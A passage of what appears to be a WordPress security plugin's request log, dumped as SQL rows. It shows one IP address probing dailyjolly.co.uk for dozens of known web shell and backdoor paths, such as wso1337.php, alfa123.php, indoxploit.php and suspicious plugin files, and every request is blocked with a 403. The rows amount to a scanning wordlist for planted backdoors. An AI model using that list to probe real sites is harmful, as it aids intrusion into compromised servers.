Safari\\/537.36\"}','zYnlv6U7sH9cEAwO2tFShXbJ',0,1673897116.4394,176,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gs2m60n5icpN9zFeaBRrJbGf',0,1673897116.7898,230,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/alfa123.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IfakWFtwRJ9ymMOLCXq7Nj3g',0,1673897117.2065,161,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/dr.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qMt9B35TZKxCegSUIONDdc26',0,1673897117.5634,177,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TGR24NBVhFEm8oL5wOpYzuXk',0,1673897118.0417,193,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fdA9xmPHoR4wzynUQFWB7T8N',0,1673897118.4378,169,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/data.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UPBJZ1gzAIGwp6Vc0ls7yWrE',0,1673897118.9459,169,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-one.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','E8isehy7tOzuL6dGqKTPal94',0,1673897119.3545,164,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cig7Y3BQ5PtyH4RUl26FMx1G',0,1673897119.8185,164,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/edit-form.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pixtJ2N8cTmnIEBZfYLsw0Fg',0,1673897120.1884,168,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wso1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CRH6rSNl8UZq4jIJpfmLkdaY',0,1673897120.6269,190,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/www.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','FfQ1p928XaMSO0JkWjveiLht',0,1673897121.0789,211,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/uploads/contexmini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fxusXF2ZWCT4LVhbAQgcd9Yw',0,1673897121.5128,177,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2duBjqIvfoGk8rAmM6nwlxSC',0,1673897121.9014,203,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/it.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vrsbKXHqP0cwW8oEQ6BzSae7',0,1673897122.3511,178,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/kiss.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZKCOGDn7keIE0tUN3za1y8Wr',0,1673897122.7368,188,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XBKsxAPFZ4YMlfun26kHLqT5',0,1673897123.1227,177,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wjFOCZMpVHDu4mT0SIfRBks6',0,1673897123.4937,172,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8ZHzfBFC16ykxJ3ros95lSGb',0,1673897124.1443,166,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DIRu05wv87Sb1diltMBLzyer',0,1673897124.5563,229,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/ohayo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oH2lbic1gyFNE4Ps38rtBT5Z',0,1673897125.1442,201,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','462jPmGZL1e78aUTkdDyRM0x',0,1673897125.6074,176,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rKY40FivlQaUy5ugmP6SOcHT',0,1673897125.9837,177,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/wp-logins.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','bUxesaXSuRfTmQrPlBZ2qMjg',0,1673897126.4452,195,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3dchrLlAeM8RI6PXwgqtpijV',0,1673897126.8748,186,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VxvHB6bahQnoSYgI87JAj4uk',0,1673897127.2666,206,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/shx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UG8yoptXMJH9bm17Rixjvans',0,1673897127.6550,201,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/FoxWSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CRh3PaSjUkTGugtryF57vZlz',0,1673897128.1148,164,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/cms.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Pqma4vidOL07hRouXkNT1crn',0,1673897128.5029,174,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/stindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cP6YSwNlCe4E1X8rognBviA3',0,1673897128.9132,162,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-uploads.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Pjfzprnh38RwBUSeaMdCH6KL',0,1673897129.2854,165,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','E5WVrcak1Ioe6CSv9uDZAtgx',0,1673897129.7654,175,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/Gel.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gbEfQHt5NWcylAiDLMeGk9YK',0,1673897130.1668,219,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1fhJs42kbMnZXcU7NtpEzva9',0,1673897143.8975,222,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Wlq9x5CG7AEQYoDcktUzOeg8',0,1673897156.8894,192,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sAJOhV49Ij2gc7NZD8wvHQxd',0,1673897172.6297,202,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/41.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OZ9VlHkWoJNAUYXfBg0y3mha',0,1673897187.6658,216,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/4price.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NPUGSwlEM5u72Kdq9OZynci8',0,1673897201.3081,248,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/MARIJUANA.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vgjDqOw0lcozahSefsu27XtM',0,1673897216.2220,228,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/fk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dAylkBW9TnEeHL0mbVDgOraK',0,1673897231.8788,239,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0cvqsuYNCgx1ySo4ARPHLJ7h',0,1673897249.2745,261,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/sindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HNnia8YElfWhK5MjvrVxD4Bc',0,1673897279.7532,211,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/baindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5zvGpNTBY0UQhcoCuKE9A2Fa',0,1673897294.7196,183,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ERipsGh7r5BHw0y8oLSOXed3',0,1673897308.9048,192,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cYWjPQx1IuBTMGZ9s0yoUf4d',0,1673897320.5890,203,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Z7HX4ujNLAROaF9PkiEV05Yl',0,1673897341.7397,222,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MDfvOXceU61tA3SZaTHG9ri4',0,1673897355.4249,228,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/themes/gaukingo/db.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0PS27CTg1mbr5qAUcntX3oOM',0,1673897370.4188,187,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/plugins/three-column-screen-layout/db.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IOmCVPN02s85hnc6AH7wQEJD',0,1673897386.5577,246,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/plugins/xichang/x.php?xi','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LszvJGcDU3t1d05eiyhBY6KO',0,1673897401.1607,287,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/plugins/wp-db-ajax-made/wp-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6xN9rneGyqK27FL4T3DC0sYP',0,1673897438.5205,229,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/shapes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9QCy7ZYp80H6ti35ju1AhTJq',0,1673897444.7631,199,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/Marvins.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0WVUCIBNLvsuqHSa7YGK2wby',0,1673897445.2065,211,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-includes/css/modules.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dQi9JxI3aq0zAyNltY5P8Vb2',0,1673897445.6621,181,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/olux.php%09%09','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GTrEhRZ3b7UIgO4lewc581kY',0,1673897446.0891,166,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/indoxploit.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kcNCXtxwvHoPg7T3p9VL6h1B',0,1673897446.5202,174,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/plugins/css-ready-sel/file.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VeNpRxPuTLSJZ4UO3YMjCng9',0,1673897447.0395,162,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/plugins/css-ready/file.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HpZW6g2VKR49hnF1JNPrdvqE',0,1673897447.3893,185,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/think.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6IWAfBaXLZj5J3vKSbRk8zxP',0,1673897447.8365,164,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','08IF7WkOBqtmTG3DiHUwRNb9',0,1673897448.1999,202,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/administrator/templates/bluestork/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','knZJjlAvL3EUbKMDaqmzGtQS',0,1673897448.5886,162,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/administrator/templates/bluestork/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BXGhjFDK1Zkpm6tMWf3OJoLr',0,1673897448.9554,178,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/administrator/templates/hathor/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','l9RLTkqhNKXPcxQ4Mbjw1Br7',0,1673897449.3899,176,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/administrator/templates/hathor/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lGZo3akNzJqRsr07SCMmE5fA',0,1673897449.9189,167,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/administrator/templates/isis/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ola26q0gwxpAQCIUH3v7SPcy',0,1673897450.3056,169,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/administrator/templates/isis/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BJVqCfHI1bdGZAjtximNehFs',0,1673897450.7210,172,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/templates/beez/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rH85Gmt9NUDx6w2cSTpXVLRq',0,1673897451.0864,198,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/templates/ja_purity/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GICgaiXMz5d6w2rmoKbStnBx',0,1673897451.5169,176,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/templates/rhuk_milkyway/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sU4xSdbQf0EJRhGIiyZAKTp5',0,1673897451.9160,210,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/templates/beez3/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jpVJUdKDogIev4umQH15axcX',0,1673897452.3711,165,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/templates/beez3/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','w5QOLvWoxTIim2sJqcKD3YSE',0,1673897452.7407,180,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/templates/beez5/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yR6piJcYnKvCMBS4GQ5z8jut',0,1673897453.1253,167,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/templates/beez5/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','P9FMrZpIsjmCxu8nzvJGhYf1',0,1673897453.4656,206,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/templates/beez_20/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VuESBjtLp6RdsrgzAb0ChWoO',0,1673897453.9934,175,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/templates/beez_20/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lfei3agr9mLnkq06YS4Q2AUx',0,1673897454.3720,191,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/templates/protostar/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','5GB8erOxvsWX0CM7Y9KRJkAw',0,1673897454.8355,163,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/templates/protostar/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','d83yn47JpXoFZGSHY9KL5mvx',0,1673897455.2807,198,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/templates/atomic/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','b1x43HnDuyAYhEjQNtcPpWe7',0,1673897455.6820,163,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/templates/atomic/error.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AIMs29OJUBQaG5T64oiDnVYe',0,1673897456.1193,181,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-admin/network/wp-footer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dZD8oQifF7XSzUtI36Ejhvel',0,1673897456.6342,174,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 